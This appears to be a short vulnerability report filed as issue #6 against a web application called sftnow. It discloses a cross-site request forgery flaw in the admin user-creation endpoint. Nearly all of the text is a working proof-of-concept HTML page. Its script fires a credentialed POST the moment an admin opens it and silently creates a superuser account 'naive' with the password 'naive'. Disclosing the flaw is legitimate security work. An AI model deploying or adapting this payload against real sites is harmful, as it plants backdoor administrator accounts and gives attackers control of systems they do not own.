CSRF Vulneratbility to add admin account #6
Description
POC is following code which clicked by admin will generate a superuser account called "naive" whose password is also "naive".
<html>
<script>
function AddUser()
{
var req = new XMLHttpRequest();
var data = "user_login=naive&user_pass=naive&user_email=admin%40qq.com&role_id%5B%5D=1";
req.onload = reqListener;
req.open('post','http://host/sftnow-master/index.php?g=Admin&m=User&a=add_post',true);
req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
req.withCredentials = true;
req.send(data);
function reqListener() {};
}
AddUser();
</script>
</html>